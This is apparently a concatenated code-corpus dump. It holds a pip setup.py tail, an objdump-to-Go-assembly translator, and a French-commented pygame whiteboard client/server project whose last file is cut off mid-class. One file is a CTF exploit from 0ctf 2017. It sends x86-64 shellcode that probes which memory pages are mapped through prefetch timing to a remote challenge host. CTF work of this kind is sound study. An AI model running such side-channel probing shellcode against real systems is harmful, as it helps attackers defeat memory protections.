'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.commands',
'venv.Lib.site-packages.pip-9.0.1-py3.7.egg.pip.operations'],
url='',
license='MIT',
author='Ariksu',
author_email='[email protected]',
description='Attempt to write peg-parser for .hfss'
)
|
Python
| 77
| 79.987015
| 125
|
/setup.py
| 0.639994
| 0.609205
|
kswgit/ctfs
|
refs/heads/master
|
from pwn import *
import time
context.update(arch='x86', bits=64)
iteration = 0x1000
cache_cycle = 0x10000000
shellcode = asm('''
_start:
mov rdi, 0x200000000
mov rsi, 0x300000000
mov rbp, 0
loop_start:
rdtsc
shl rdx, 32
or rax, rdx
push rax
mov rax, rdi
mov rdx, %d
a:
mov rcx, 0x1000
a2:
prefetcht1 [rax+rcx]
loop a2
dec edx
cmp edx, 0
ja a
b:
rdtsc
shl rdx, 32
or rax, rdx
pop rbx
sub rax, rbx
cmp rax, %d
jb exists
mov byte ptr [rsi], 1
jmp next
exists:
mov byte ptr [rsi], 0
next:
inc rsi
inc rbp
add rdi, 0x2000
cmp rbp, 64
jne loop_start
end:
int3
''' % (iteration, cache_cycle))
HOST, PORT = '0.0.0.0', 31337
HOST, PORT = '202.120.7.198', 13579
r = remote(HOST, PORT)
p = time.time()
r.send(p32(len(shellcode)) + shellcode)
print(r.recvall())
print(time.time() - p)
|
Python
| 56
| 12.803572
| 39
|
/0ctf2017/pages.py
| 0.68863
| 0.577519
|
esdb/plinear
|
refs/heads/master
|
assembly = '''
7328- 400560: c5 f9 6e c7 vmovd %edi,%xmm0
7378- 400564: c4 e2 7d 58 c0 vpbroadcastd %xmm0,%ymm0
7435- 400569: c5 fd 76 0e vpcmpeqd (%rsi),%ymm0,%ymm1
7495- 40056d: c5 fd 76 56 20 vpcmpeqd 0x20(%rsi),%ymm0,%ymm2
7559- 400572: c5 fd 76 5e 40 vpcmpeqd 0x40(%rsi),%ymm0,%ymm3
7623- 400577: c5 fd 76 86 80 00 00 vpcmpeqd 0x80(%rsi),%ymm0,%ymm0
7687- 40057e: 00
7701- 40057f: c5 f5 6b ca vpackssdw %ymm2,%ymm1,%ymm1
7761- 400583: c5 e5 6b c0 vpackssdw %ymm0,%ymm3,%ymm0
7821- 400587: c5 f5 63 c0 vpacksswb %ymm0,%ymm1,%ymm0
7881- 40058b: c5 fd d7 c0 vpmovmskb %ymm0,%eax
7934- 40058f: c5 f8 77 vzeroupper
'''
print(assembly)
lines = assembly.strip().splitlines()
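# The loop below re-packs the opcode bytes of each objdump line (fixed-width columns
# after the address) into QUAD/LONG/WORD/BYTE data directives, apparently targeting
# Go/Plan 9 assembler syntax, keeping the original mnemonic as a trailing // comment.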
i = 0
while True:
if i >= len(lines):
break
line = lines[i]
i += 1
line = line[line.find(':') + 3:]
byte1 = line[:2] if len(line) >= 2 else ' '
byte2 = line[3:5] if len(line) >= 5 else ' '
byte3 = line[6:8] if len(line) >= 8 else ' '
byte4 = line[9:11] if len(line) >= 11 else ' '
byte5 = line[12:14] if len(line) >= 14 else ' '
byte6 = line[15:17] if len(line) >= 17 else ' '
byte7 = line[18:20] if len(line) >= 20 else ' '
if byte6 != ' ':
comment = line[24:]
line = lines[i]
i += 1
line = line[line.find(':') + 3:]
byte8 = line[:2] if len(line) >= 2 else ' '
print(' QUAD $0x%s%s%s%s%s%s%s%s // %s' % (byte8, byte7, byte6, byte5, byte4, byte3, byte2, byte1, comment))
elif byte5 != ' ':
print(' LONG $0x%s%s%s%s; BYTE $0x%s // %s' % (byte4, byte3, byte2, byte1, byte5, line[24:]))
elif byte4 != ' ':
print(' LONG $0x%s%s%s%s // %s' % (byte4, byte3, byte2, byte1, line[24:]))
elif byte3 != ' ':
print(' WORD $0x%s%s; BYTE $0x%s // %s' % (byte2, byte1, byte3, line[24:]))
|
Python
| 44
| 43.386364
| 119
|
/c/translate.py
| 0.524322
| 0.376856
|
riadghorra/whiteboard-oop-project
|
refs/heads/master
|
"""
Module containing all the basic figures and operations
"""
import pygame
import pygame.draw
from datetime import datetime
def distance(v1, v2):
"""
Compute the Euclidean distance between two vectors
"""
try:
return ((v1[0] - v2[0]) ** 2 + (v1[1] - v2[1]) ** 2) ** 0.5
except TypeError:
return "Ce ne sont pas des vecteurs"
class Figure:
def __init__(self):
pass
def draw(self):
pass
def fetch_params(self):
pass
class Point(Figure):
"""
Class for a point ready to be drawn on the board
coord (list) : coordinates
point_color (list) : color in RGB
font_size (int) : thickness in pixels
toolbar_size (int) : height of the toolbar at the top of the board, which the point must not overlap
"""
def __init__(self, coord, point_color, font_size, toolbar_size=0):
Figure.__init__(self)
self.point_color = point_color
self.font_size = font_size
# used to not write on the toolbar if the font size is big
self.coord = [coord[0], max(coord[1], toolbar_size + font_size + 1)]
self.type = "Point"
def draw(self, screen):
"""
Draw the point on the screen
"""
pygame.draw.circle(screen, self.point_color, self.coord, self.font_size)
pygame.display.flip()
return
def fetch_params(self):
"""
Return a dictionary of the parameters
"""
return {"coord": self.coord, "point_color": self.point_color, "font_size": self.font_size}
class Line(Figure):
"""
Class for a straight line
line_color (list) : color of the line in RGB
start_pos (list): coordinates of the start of the line
end_pos (list) : coordinates of the end of the line
font_size (int): thickness
"""
def __init__(self, line_color, start_pos, end_pos, font_size):
Figure.__init__(self)
self.line_color = line_color
self.start_pos = start_pos
self.end_pos = end_pos
self.font_size = font_size
self.type = "Line"
def draw(self, screen):
"""
Draw the line on the screen
"""
pygame.draw.line(screen, self.line_color, self.start_pos, self.end_pos, self.font_size)
return
def fetch_params(self):
"""
Return a dictionary of the parameters
"""
return {"line_color": self.line_color, "start_pos": self.start_pos, "end_pos": self.end_pos,
"font_size": self.font_size}
class Rectangle(Figure):
"""
Class for a rectangle
color (list) : color of the rectangle
left, right (int) : x coordinates of the left and right edges of the rectangle
bottom, top (int) : y coordinates of the top and bottom edges of the rectangle
"""
def __init__(self, c1, c2, color):
"""
The rectangle parameters are defined from the coordinates of two corners
c1, c2 (lists): coordinates of two corners of the rectangle
"""
Figure.__init__(self)
self.c1 = c1
self.c2 = c2
self.color = color
# left is the min of the x coordinates; right, top and bottom are obtained the same way
self.left = min(c1[0], c2[0])
self.top = min(c1[1], c2[1])
self.right = max(c1[0], c2[0])
self.bottom = max(c1[1], c2[1])
self.width = self.right - self.left
self.length = self.bottom - self.top
self.rect = pygame.Rect(self.left, self.top, self.width, self.length)
self.type = "rect"
def draw(self, screen):
"""
Draw the rectangle on the screen
"""
pygame.draw.rect(screen, self.color, self.rect, 0)
def fetch_params(self):
"""
Return a dictionary of the parameters
"""
return {"c1": self.c1, "c2": self.c2, "color": self.color}
class Circle(Figure):
"""
Class for a circle
center (list) : coordinates of the center
extremity (list) : coordinates of a point on the circle
color (list) : color
toolbar_size (int) : size of the toolbar in pixels, so that we do not draw over it
radius (int) : radius
"""
def __init__(self, center, extremity, color, toolbar_size=0):
Figure.__init__(self)
self.center = center
# we do not want to overlap the toolbar, so the radius is reduced
self.radius = min(int(distance(center, extremity)), center[1] - toolbar_size - 1)
self.extremity = [center[0] + self.radius, center[1]]
self.color = color
self.type = "circle"
def draw(self, screen):
"""
Draw the circle on the screen
"""
pygame.draw.circle(screen, self.color, self.center, self.radius)
def fetch_params(self):
"""
Return a dictionary of the parameters
"""
return {"center": self.center, "extremity": self.extremity, "color": self.color}
class TextBox(Figure):
"""
Class for a textbox
x, y (int) : coordinates of the top-left corner, i.e. (x, y) is the topleft
w (int) : width of the textbox
h (int) : height of the textbox
box_color (list) : color of the box outline
font (string) : font of the text
font_size (int) : character size
text (string) : text of the textbox
text_color (list) : color of the text
"""
def __init__(self, x, y, w, h, box_color, font, font_size, text, text_color):
Figure.__init__(self)
self.__rect = pygame.Rect(x, y, w, h)
self._color = box_color
self._text = text
self._font = font
self._font_size = font_size
self._sysfont = pygame.font.SysFont(font, font_size)
self._text_color = text_color
self._txt_surface = self._sysfont.render(text, True, self._text_color)
self.id_counter = str(x) + "_" + str(y)
self.type = "Text_box"
"""
Encapsulation
"""
def fetch_params(self):
"""
Return a dictionary of the parameters
"""
return {"x": self.__rect.x, "y": self.__rect.y, "w": self.__rect.w, "h": self.__rect.h,
"box_color": self._color, "font": self._font, "font_size": self._font_size, "text": self._text,
"text_color": self._text_color}
def get_textbox_color(self):
return self._color
def set_textbox_color(self, new_color):
self._color = new_color
def get_textbox_text(self):
return self._text
def add_character_to_text(self, char, whiteboard):
"""
Append a character to the text
"""
id_counter = whiteboard.active_box.id_counter
for action in [x for x in whiteboard.get_hist('actions') if x['type'] == 'Text_box']:
if action['id'] == id_counter:
if action['owner'] in whiteboard.modification_allowed or action['owner'] == whiteboard.name:
self._text += char
action['params']["text"] = whiteboard.active_box.get_textbox_text()
action['params']["w"] = whiteboard.active_box.update()
now = datetime.now()
timestamp = datetime.timestamp(now)
action['timestamp'] = timestamp
action['client'] = whiteboard.name
action_to_update_textbox = action
for textbox in whiteboard.get_text_boxes():
if textbox.id_counter == id_counter:
if action['owner'] in whiteboard.modification_allowed or action['owner'] == whiteboard.name:
whiteboard.del_text_box(textbox)
try:
whiteboard.append_text_box(TextBox(**action_to_update_textbox["params"]))
except UnboundLocalError:
print('Something unexpected happened. A textbox update may have failed')
def delete_char_from_text(self, whiteboard):
"""
Delete the last character of the text
"""
id_counter = whiteboard.active_box.id_counter
for action in [x for x in whiteboard.get_hist('actions') if x['type'] == 'Text_box']:
if action['id'] == id_counter:
if action['owner'] in whiteboard.modification_allowed or action['owner'] == whiteboard.name:
self._text = self._text[:-1]
action['params']["text"] = whiteboard.active_box.get_textbox_text()
now = datetime.now()
timestamp = datetime.timestamp(now)
action['timestamp'] = timestamp
action['client'] = whiteboard.name
action_to_update_textbox = action
for textbox in whiteboard.get_text_boxes():
if textbox.id_counter == id_counter:
if action['owner'] in whiteboard.modification_allowed or action['owner'] == whiteboard.name:
whiteboard.del_text_box(textbox)
try:
whiteboard.append_text_box(TextBox(**action_to_update_textbox["params"]))
except UnboundLocalError:
print('Something unexpected happened. A textbox update may have failed')
def render_font(self, text, color, antialias=True):
"""
Render the text
"""
return self._sysfont.render(text, antialias, color)
def set_txt_surface(self, value):
self._txt_surface = value
@property
def rect(self):
return self.__rect
def update(self):
"""
Resize the outline rectangle if the text is too long
"""
width = max(140, self._txt_surface.get_width() + 20)
self.__rect.w = width
return width
def draw(self, screen):
"""
Draw the textbox
"""
# Blit the text
screen.blit(self._txt_surface, (self.__rect.x + 5, self.__rect.y + 5))
# Blit the rectangle outline
pygame.draw.rect(screen, self._color, self.__rect, 2)
# =============================================================================
# instant drawing functions
# =============================================================================
def draw_point(params, screen):
"""
Draw a point on the screen from the input parameters
params (dict) : dictionary of parameters
screen (pygame screen) : screen to draw on
"""
try:
return Point(**params).draw(screen)
except TypeError:
return "Parametres incorrect"
def draw_line(params, screen):
"""
Draw a line on the screen from the input parameters
params (dict) : dictionary of parameters
screen (pygame screen) : screen to draw on
"""
try:
return Line(**params).draw(screen)
except TypeError:
return "Parametres incorrect"
def draw_textbox(params, screen):
"""
Draw a textbox on the screen from the input parameters
params (dict) : dictionary of parameters
screen (pygame screen) : screen to draw on
"""
try:
return TextBox(**params).draw(screen)
except TypeError:
return "Parametres incorrect"
def draw_rect(params, screen):
"""
Draw a rectangle on the screen from the input parameters
params (dict) : dictionary of parameters
screen (pygame screen) : screen to draw on
"""
try:
return Rectangle(**params).draw(screen)
except TypeError:
return "Parametres incorrect"
def draw_circle(params, screen):
"""
Draw a circle on the screen from the input parameters
params (dict) : dictionary of parameters
screen (pygame screen) : screen to draw on
"""
try:
return Circle(**params).draw(screen)
except TypeError:
return "Parametres incorrect"
|
Python
| 354
| 32.785309
| 116
|
/src/figures.py
| 0.577759
| 0.572659
|
riadghorra/whiteboard-oop-project
|
refs/heads/master
|
import socket
import json
import sys
import math
from white_board import WhiteBoard, binary_to_dict
'''
Load the initial configuration stored in config.json, which contains the drawing mode, the color and
the pen size.
These parameters can then be changed by the user in the pygame interface
'''
with open('config.json') as json_file:
start_config = json.load(json_file)
'''
Definition of the server IP address. Here the server runs locally.
'''
hote = start_config["ip_serveur"]
port = 5001
def main():
"""
Create a socket to communicate over TCP/IP
"""
connexion_avec_serveur = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the server
try:
connexion_avec_serveur.connect((hote, port))
except (TimeoutError, ConnectionRefusedError, ConnectionResetError, ConnectionAbortedError) as e:
return print("Le serveur n'a pas répondu, vérifiez les paramètres de connexion")
print("Connexion réussie avec le serveur")
# First get the client id
username = binary_to_dict(connexion_avec_serveur.recv(2 ** 16))["client_id"]
# Second get the message size
msg_recu = connexion_avec_serveur.recv(2 ** 8)
message_size = binary_to_dict(msg_recu)["message_size"]
# Then get the first chunk of history, using a buffer size equal to the power of 2 just above the message size
msg_recu = connexion_avec_serveur.recv(2 ** int(math.log(message_size, 2) + 1))
total_size_received = sys.getsizeof(msg_recu)
# Once we get the first chunk, we loop until we get the whole history
while total_size_received < message_size:
msg_recu += connexion_avec_serveur.recv(2 ** int(math.log(message_size, 2) + 1))
total_size_received = sys.getsizeof(msg_recu)
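# Worked example (illustrative): if message_size were 5000 bytes, int(math.log(5000, 2) + 1) == 13,
# so each recv above uses a buffer of 2 ** 13 = 8192 bytes, the power of two just above the size.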
msg_decode = binary_to_dict(msg_recu)
hist = msg_decode
# After receiving the whiteboard state, i.e. the figures and textboxes already drawn by previous
# users, the program starts a whiteboard
whiteboard = WhiteBoard(username, start_config, hist)
whiteboard.start(connexion_avec_serveur)
if __name__ == '__main__':
main()
|
Python
| 62
| 34.112904
| 120
|
/src/client.py
| 0.707855
| 0.700505
|
riadghorra/whiteboard-oop-project
|
refs/heads/master
|
from white_board import WhiteBoard
import json
'''
This file is used to run locally or to debug
'''
with open('config.json') as json_file:
start_config = json.load(json_file)
def main():
board = WhiteBoard("client", start_config)
board.start_local()
if __name__ == '__main__':
main()
|
Python
| 18
| 16
| 46
|
/src/main.py
| 0.647059
| 0.647059
|
riadghorra/whiteboard-oop-project
|
refs/heads/master
|
import socket
import sys
import time
from threading import Thread
import json
'''
The two functions below convert dictionaries to binary and back.
Calling these two functions makes it possible to exchange dictionaries over a socket
'''
def dict_to_binary(dico):
try:
str = json.dumps(dico)
return bytes(str, 'utf-8')
except TypeError:
print("Le dictionnaire n'est pas du format attendu")
def binary_to_dict(binary):
try:
jsn = ''.join(binary.decode("utf-8"))
d = json.loads(jsn)
except (TypeError, json.decoder.JSONDecodeError) as e:
if isinstance(e, TypeError):
print("Le message reçu n'est pas du format attendu")
else:
print("Un paquet a été perdu")
return {"actions": [], "message": [], "auth": []}
return d
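# Minimal round-trip sketch for the two helpers above (illustrative values only):
# payload = {"message": "", "actions": [], "auth": []}
# assert binary_to_dict(dict_to_binary(payload)) == payload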
class Client(Thread):
"""
Class for a client connected to the whiteboard. It inherits from Thread so that several clients
can use the whiteboard in parallel.
Each client has a name, a boolean indicating whether the client is done using the whiteboard,
and a history of all the operations performed by this client or by the other users on the whiteboard.
This history is what the client exchanges with the server
"""
# Class level id for client
client_id = 1
def __init__(self, server_, client_socket=None):
Thread.__init__(self)
self._client_socket = client_socket
self._done = False
self._last_timestamp_sent = 0
self.server = server_
# Increment client id at each creation of instance
self.client_id = "Client" + str(Client.client_id)
Client.client_id += 1
"""Encapsulation"""
def __get_client_socket(self):
return self._client_socket
def __set_client_socket(self, c):
self._client_socket = c
client_socket = property(__get_client_socket, __set_client_socket)
def __get_last_timestamp_sent(self):
return self._last_timestamp_sent
def __set_last_timestamp_sent(self, c):
self._last_timestamp_sent = c
last_timestamp_sent = property(__get_last_timestamp_sent, __set_last_timestamp_sent)
def is_done(self):
return self._done
def end(self):
self._done = True
def check_match(self, action):
"""
Method checking whether an action already exists in the server history.
In particular, it tells whether a textbox was just added by another whiteboard user or
whether an existing textbox was simply updated
"""
for textbox in [x for x in self.server.historique["actions"] if x["type"] == "Text_box"]:
if action["id"] == textbox["id"]:
textbox["timestamp"] = action["timestamp"]
textbox["params"] = action["params"]
textbox["client"] = action["client"]
return True
return False
def disconnect_client(self):
"""
Method executed to end the connection between the server and a client
"""
self.end()
print("Déconnexion d'un client")
self.server.historique["message"] = "end"
def run(self):
"""
In this method, the central while loop continuously receives the history dictionaries sent
by the clients.
If a dictionary differs from the previous one, it means that a user made an update.
The timestamps of these updates are then compared with last_timestamp, the last timestamp
at which the whiteboard was up to date.
All the new operations are then sent to the client
"""
try:
while not self.is_done():
msg_recu = self.client_socket.recv(2 ** 24)
new_actions = binary_to_dict(msg_recu)
# Go through each new action and add it to history. There are two cases: if it is an action on
# an already existing text box, modify that box in history; otherwise append the action to the history
for action in new_actions["actions"]:
matched = False
if action["type"] == "Text_box":
matched = self.check_match(action)
if not matched:
self.server.historique["actions"].append(action)
if self.server.historique["message"] == "END":
# Runs if the client disconnects
self.disconnect_client()
if new_actions["auth"] != []:
if new_actions["auth"][1]:
self.server.historique["auth"].append(new_actions["auth"][0])
else:
self.server.historique["auth"].remove(new_actions["auth"][0])
time.sleep(0.01)
actions_to_send = [x for x in self.server.historique["actions"] if
(x["timestamp"] > self.last_timestamp_sent and x["client"] != self.client_id)]
to_send = {"message": "", 'actions': actions_to_send, 'auth': self.server.historique["auth"]}
self.client_socket.send(dict_to_binary(to_send))
# Update last timestamp if there is a new action
if actions_to_send:
self.last_timestamp_sent = max([x["timestamp"] for x in actions_to_send])
except (ConnectionAbortedError, ConnectionResetError) as e:
# Handle the sudden disconnection of a client
print("Un client s'est déconnecté")
class Server:
"""
This class defines a server.
Its parameters are a port and a host address, needed to create a connection,
a socket connection belonging to the server,
a list of clients to connect,
a list of launched threads, which is the list of currently connected clients,
and a history dictionary of the operations made on the server, to be exchanged with the clients
"""
def __init__(self, port, host='', historique=None):
self._host = host
self._port = port
self.__connexion = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__clients = []
self.__threadlaunched = []
if historique is None:
self.historique = {"message": "", 'actions': [], 'auth': []}
else:
self.historique = historique
'''The following methods and properties handle encapsulation'''
@property
def host(self):
return self._host
@property
def port(self):
return self._port
@property
def clients(self):
return self.__clients
def add_client(self, new_client):
self.__clients.append(new_client)
def remove_client(self, client_removed):
self.__clients.remove(client_removed)
@property
def threadlaunched(self):
return self.__threadlaunched
def add_thread(self, new_thread):
self.__threadlaunched.append(new_thread)
def remove_thread(self, thread_removed):
self.__threadlaunched.remove(thread_removed)
def scan_new_client(self):
"""Cette méthode permet de récupérer les informations du client entrant"""
# Get connexion info from server
client, infos_connexion = self.__connexion.accept()
# Initialize a new client thread
new_thread = Client(self)
# Give them an id and send it to server
client_id = new_thread.client_id
client.send(dict_to_binary({"client_id": client_id}))
to_send = dict_to_binary(self.historique)
# Get the size of history and send it because it can be too long
message_size = sys.getsizeof(to_send)
client.send(dict_to_binary({"message_size": message_size}))
# Wait a little for the previous message to not overlap with the next one
## !!WARNING!! DEPENDING ON THE COMPUTER THIS SLEEP TIME MAY BE TOO SMALL, IF THE WHITEBOARD CRASHES, PLEASE
## INCREASE IT
time.sleep(0.5)
client.send(to_send)
# Get the last timestamp sent to client
try:
new_thread.last_timestamp_sent = max([x["timestamp"] for x in self.historique["actions"]])
except ValueError:
new_thread.last_timestamp_sent = 0
new_thread.client_socket = client
self.add_client(new_thread)
print("Un client s'est connecté. Bienvenue {} !".format(client_id))
def run(self):
"""
In this method, the while loop continuously listens for new potential clients
and handles client disconnections and thread shutdowns"""
self.__connexion.bind((self.host, self.port))
# The server will accept at most 100 clients
self.__connexion.listen(100)
print("Le serveur est prêt sur le port numéro {}".format(self.port))
while True:
self.scan_new_client()
for client in self.clients:
client.start()
self.remove_client(client)
self.add_thread(client)
for thread in self.threadlaunched:
if thread.is_done():
thread.join()
self.remove_thread(thread)
if __name__ == '__main__':
server = Server(5001, '')
server.run()
|
Python
| 252
| 37.111111
| 119
|
/src/serveur.py
| 0.609329
| 0.606518
|
riadghorra/whiteboard-oop-project
|
refs/heads/master
|
"""
Module containing the various board management tools
"""
import pygame
import pygame.draw
from datetime import datetime
from figures import Point, Line, TextBox, Rectangle, Circle
import time
# =============================================================================
# classes that handle user parameter changes
# =============================================================================
class TriggerBox:
"""
Abstract parent class representing a square area of the screen that can be clicked
top_left (list) : coordinates of the top-left pixel
size (int) : side length of the square in pixels
"""
def __init__(self, top_left, size):
self.rect = pygame.Rect(top_left, size)
self.coords = top_left
def is_triggered(self, event):
"""
Return the boolean: the user clicked on the triggerbox
event (pygame event) : a user's mouse click
"""
return self.rect.collidepoint(event.pos)
class Auth(TriggerBox):
"""
Class for a button that toggles the modification authorization
"""
def __init__(self, top_left, size):
TriggerBox.__init__(self, top_left, size)
self._size = size
def add(self, screen):
"""
Draw the auth box
"""
pygame.draw.rect(screen, [0, 0, 0], self.rect, 1)
pygame.draw.circle(screen, [255, 0, 0],
[int(self.coords[0] + self._size[0] / 2), int(self.coords[1] + self._size[1] / 2)],
int(min(self._size[0], self._size[1] / 3)))
font = pygame.font.Font(None, 18)
legend = {"text": font.render("auth", True, [0, 0, 0]), "coords": self.coords}
screen.blit(legend["text"], legend["coords"])
def switch(self, screen, erasing_auth, modification_allowed, name):
if erasing_auth:
pygame.draw.circle(screen, [0, 255, 0],
[int(self.coords[0] + self._size[0] / 2), int(self.coords[1] + self._size[1] / 2)],
int(min(self._size[0], self._size[1] / 3)))
print("{} a donné son autorisation de modifications".format(name))
else:
pygame.draw.circle(screen, [255, 0, 0],
[int(self.coords[0] + self._size[0] / 2), int(self.coords[1] + self._size[1] / 2)],
int(min(self._size[0], self._size[1] / 3)))
print("{} a retiré son autorisation de modifications".format(name))
return [name, erasing_auth]
class Save(TriggerBox):
"""
Class for a button that saves the whiteboard as a PNG file
"""
def __init__(self, top_left, size):
TriggerBox.__init__(self, top_left, size)
self._size = size
def add(self, screen):
"""
Draw the save box
"""
pygame.draw.rect(screen, [0, 0, 0], self.rect, 1)
font = pygame.font.Font(None, 18)
legend = {"text": font.render("save", True, [0, 0, 0]), "coords": self.coords}
screen.blit(legend["text"], legend["coords"])
def save(self, screen, whiteboard):
pygame.image.save(screen.subsurface((0, whiteboard.get_config(["toolbar_y"]) + 1,
whiteboard.get_config(["width"]),
whiteboard.get_config(["length"]) - whiteboard.get_config(
["toolbar_y"]) - 1)), "mygreatdrawing.png")
class Mode(TriggerBox):
"""
Class for a board drawing mode, which can be entered via the triggerbox it inherits from
name (string) : name of the mode, written inside its triggerbox on the screen
"""
def __init__(self, name, top_left, size):
super(Mode, self).__init__(top_left, size)
self.name = name
def add(self, screen):
"""
Draw the mode's triggerbox and make it active on the screen
"""
pygame.draw.rect(screen, [0, 0, 0], self.rect, 1)
font = pygame.font.Font(None, 18)
legend = {"text": font.render(self.name, True, [0, 0, 0]), "coords": self.coords}
screen.blit(legend["text"], legend["coords"])
class ColorBox(TriggerBox):
"""
Class for a color selection triggerbox on the screen
color (list) : color of the box
"""
def __init__(self, color, top_left, size):
super(ColorBox, self).__init__(top_left, size)
self.color = color
def add(self, screen):
"""
Draw the color box
"""
pygame.draw.rect(screen, self.color, self.rect)
class FontSizeBox(TriggerBox):
"""
Class for the pen thickness selection triggerboxes
font_size (int) : pen thickness in pixels
"""
def __init__(self, font_size, top_left, size):
super(FontSizeBox, self).__init__(top_left, size)
self.font_size = font_size
self.center = [top_left[0] + size[0] // 2,
top_left[1] + size[1] // 2]  # to draw a circle representing the selected thickness
def add(self, screen):
"""
Draw the font size box
"""
pygame.draw.rect(screen, [0, 0, 0], self.rect, 1)
pygame.draw.circle(screen, [0, 0, 0], self.center, self.font_size)
# =============================================================================
# classes that handle user events
# =============================================================================
class EventHandler:
"""
Parent class of the user event handlers, one per mode
whiteboard : whiteboard instance on which the handler manages user events
"""
def __init__(self, whiteboard):
self.whiteboard = whiteboard
def handle(self, event):
"""
This check, common to all modes, verifies whether the user quits or changes mode
"""
out = False
if event.type == pygame.QUIT:
self.whiteboard.end()
self.whiteboard.switch_config("quit")
out = True
if event.type == pygame.MOUSEBUTTONDOWN:
coord = event.dict['pos']
if coord[1] <= self.whiteboard.get_config(["toolbar_y"]):
self.whiteboard.switch_config(event)
out = True
return out
class HandlePoint(EventHandler):
"""
Event handler class for point mode
"""
def __init__(self, whiteboard):
EventHandler.__init__(self, whiteboard)
def handle_all(self, event):
"""
In point mode we only handle left mouse clicks and draw a point
"""
handled = self.handle(event)
# common to all handlers: checks whether the user changes mode or quits
if handled:
return
if event.type == pygame.MOUSEBUTTONDOWN:
if event.dict["button"] != 1:
return
coord = event.dict["pos"]
to_draw = Point(coord,
self.whiteboard.get_config(["active_color"]),
self.whiteboard.get_config(["font_size"]), self.whiteboard.get_config(["toolbar_y"]))
now = datetime.now()
timestamp = datetime.timestamp(now)
self.whiteboard.draw(to_draw, timestamp)
class HandleLine(EventHandler):
"""
Event handler class for line mode
"""
def __init__(self, whiteboard):
EventHandler.__init__(self, whiteboard)
def handle_mouse_motion(self):
"""
Handle mouse movements: while the user holds the click down, the stroke is rendered live
"""
if self.whiteboard.is_drawing():
self.whiteboard.mouse_position = pygame.mouse.get_pos()
if self.whiteboard.mouse_position[1] <= self.whiteboard.get_config(["toolbar_y"]):
self.whiteboard.pen_up()
elif self.whiteboard.last_pos is not None:
to_draw = Line(self.whiteboard.get_config(["active_color"]), self.whiteboard.last_pos,
self.whiteboard.mouse_position,
self.whiteboard.get_config(["font_size"]))
now = datetime.now()
timestamp = datetime.timestamp(now)
self.whiteboard.draw(to_draw, timestamp)
self.whiteboard.update_last_pos()
def handle_mouse_button_up(self):
"""
Handle the release of the mouse button: perform a pen up
"""
self.whiteboard.mouse_position = (0, 0)
self.whiteboard.pen_up()
self.whiteboard.reset_last_pos()
def handle_mouse_button_down(self):
"""
Handle the user's click: pen down
"""
self.whiteboard.pen_down()
def handle_all(self, event):
"""
Handle every event with the matching method via a chain of ifs
"""
handled = self.handle(event)
if handled:
return
elif event.type == pygame.MOUSEMOTION:
self.handle_mouse_motion()
elif event.type == pygame.MOUSEBUTTONUP:
self.handle_mouse_button_up()
elif event.type == pygame.MOUSEBUTTONDOWN:
self.handle_mouse_button_down()
pygame.display.flip()
class HandleText(EventHandler):
"""
Event handler class for textbox mode
"""
def __init__(self, whiteboard):
EventHandler.__init__(self, whiteboard)
def box_selection(self, event):
"""
Handle user clicks
On a right click, a new box is created
On a left click, check whether it selects the area of an existing box, which then becomes the
active box
"""
if event.dict["button"] == 3:
coord = event.dict['pos']
text_box = TextBox(*coord, self.whiteboard.get_config(["text_box", "textbox_width"]),
self.whiteboard.get_config(["text_box", "textbox_length"]),
self.whiteboard.get_config(["text_box", "active_color"]),
self.whiteboard.get_config(["text_box", "font"]),
self.whiteboard.get_config(["text_box", "font_size"]), "",
self.whiteboard.get_config(["active_color"]))
self.whiteboard.append_text_box(text_box)
now = datetime.now()
timestamp = datetime.timestamp(now)
self.whiteboard.draw(text_box, timestamp)
self.whiteboard.set_active_box(text_box)
elif event.dict["button"] == 1:
for box in self.whiteboard.get_text_boxes():
if box.rect.collidepoint(event.pos):
self.whiteboard.set_active_box(box, new=False)
def write_in_box(self, event):
"""
Handle the user's keyboard input
If a box is selected, its text is modified accordingly
"""
if self.whiteboard.active_box is not None:
# delete one character
if event.key == pygame.K_BACKSPACE:
self.whiteboard.active_box.delete_char_from_text(self.whiteboard)
# to modify the box we unfortunately have to re-render the whole board
self.whiteboard.clear_screen()
self.whiteboard.load_actions(self.whiteboard.get_hist())
elif event.key == pygame.K_TAB or event.key == pygame.K_RETURN:
pass
else:
self.whiteboard.active_box.add_character_to_text(event.unicode, self.whiteboard)
# everything is re-rendered here too, to avoid overlapping text
self.whiteboard.clear_screen()
self.whiteboard.load_actions(self.whiteboard.get_hist())
if self.whiteboard.active_box is not None:
# Re-render the text.
self.whiteboard.active_box.set_txt_surface(self.whiteboard.active_box.render_font(
self.whiteboard.active_box.get_textbox_text(),
self.whiteboard.active_box.get_textbox_color()))
def handle_all(self, event):
"""
Handle every event with the matching method via a chain of ifs
"""
handled = self.handle(event)
if handled:
return
if event.type == pygame.MOUSEBUTTONDOWN:
self.box_selection(event)
if event.type == pygame.KEYDOWN:
self.write_in_box(event)
pygame.display.flip()
class HandleRect(EventHandler):
"""
Event handler class for rectangle mode
We decided to use a click-and-drag system to draw a rectangle
"""
def __init__(self, whiteboard):
EventHandler.__init__(self, whiteboard)
self.c1 = None
def handle_mouse_button_up(self, coord):
"""
Get the second corner coordinate of the rectangle to draw when the user releases the click
"""
if self.c1 is not None:
coord = list(coord)
# we do not want to overlap the toolbar
coord[1] = max(self.whiteboard.get_config(["toolbar_y"]), coord[1])
to_draw = Rectangle(self.c1, coord, self.whiteboard.get_config(["active_color"]))
now = datetime.now()
timestamp = datetime.timestamp(now)
self.whiteboard.draw(to_draw, timestamp)
self.c1 = None
def handle_mouse_button_down(self, event):
"""
Get one corner coordinate of the rectangle to draw when the user starts a click
"""
if event.dict["button"] != 1:
return
self.c1 = event.dict['pos']
def handle_all(self, event):
"""
Handle every event with the matching method via a chain of ifs
"""
handled = self.handle(event)
if handled:
return
elif event.type == pygame.MOUSEBUTTONUP:
self.handle_mouse_button_up(coord=event.dict['pos'])
elif event.type == pygame.MOUSEBUTTONDOWN:
self.handle_mouse_button_down(event)
pygame.display.flip()
class HandleCircle(EventHandler):
"""
Event handler class for circle mode
Here again we decided to use a click-and-drag system to draw a circle
"""
def __init__(self, whiteboard):
EventHandler.__init__(self, whiteboard)
self.center = None
def handle_mouse_button_up(self, coord):
"""
Get the coordinate of a point on the circle when the user releases the click
"""
if self.center is not None:
coord = list(coord)
to_draw = Circle(self.center, coord, self.whiteboard.get_config(["active_color"]),
self.whiteboard.get_config(["toolbar_y"]))
now = datetime.now()
timestamp = datetime.timestamp(now)
self.whiteboard.draw(to_draw, timestamp)
self.center = None
